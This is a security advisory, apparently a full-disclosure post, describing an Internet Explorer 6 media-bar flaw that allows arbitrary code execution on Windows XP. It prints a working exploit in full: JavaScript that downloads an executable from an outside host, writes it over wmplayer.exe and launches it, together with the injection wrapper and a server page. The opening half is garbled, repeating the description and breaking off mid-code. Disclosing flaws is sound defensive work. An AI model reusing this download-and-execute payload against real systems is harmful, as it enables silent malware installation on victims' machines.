Internet explorer 6 on windows XP allows exection of arbitrary code
DESCRIPTION :
Yesterday Liu Die Yu released a number series of advisories concerning
internet explorer
by combining on of these issues with an earlier issue I myself reported a
while back
You can construct a specially crafted webpage that can take any action on a
users system
including but not limited to, installing trojans, keyloggers, wiping the
users harddrive etc.
TECHNICAL EXPLAINATION :
Internet explorer 6 comes with a media sidebar in wich you can load and play
mediaclips
without even leaving the browser. when you instruct the mediabar to load a
file from an
unknown host or the HTTP status returned by an existing host indicates an
error
this media bar displays an error page inside the media bar namely
res URL's are treated as being in the "my computer zone" and are loaded from
the users filesystem
perfect conditions for the issue I describe on
http://www.mail-archive.com/full-disclosure (at) lists.netsys (dot) com [email concealed]/msg06791.ht
ml
To work. now all that is needed is a way to inject this exploit code into
this page
This method was graciously provided by Liu Die Yu as you can read on
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
DESCRIPTION :
Yesterday Liu Die Yu released a number series of advisories concerning
internet explorer
by combining on of these issues with an earlier issue I myself reported a
while back
You can construct a specially crafted webpage that can take any action on a
users system
including but not limited to, installing trojans, keyloggers, wiping the
users harddrive etc.
TECHNICAL EXPLAINATION :
Internet explorer 6 comes with a media sidebar in wich you can load and play
mediaclips
without even leaving the browser. when you instruct the mediabar to load a
file from an
unknown host or the HTTP status returned by an existing host indicates an
error
this media bar displays an error page inside the media bar namely
res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path
res URL's are treated as being in the "my computer zone" and are loaded from
the users filesystem
perfect conditions for the issue I describe on
http://www.mail-archive.com/full-disclosure (at) lists.netsys (dot) com [email concealed]/msg06791.ht
ml
To work. now all that is needed is a way to inject this exploit code into
this page
This method was graciously provided by Liu Die Yu as you can read on
http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0
Combining these issues we get something like :
--snip--
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
--snip--
error.jsp is a jsp page that consists of one line, namely
<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>
DEMONSTRATION :
A demonstration is provided at :
http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
WORKAROUND :
Disable active scripting or do "the sensible thing" and pick another browser
such as the
excellent mozilla firebird.
[ reply ]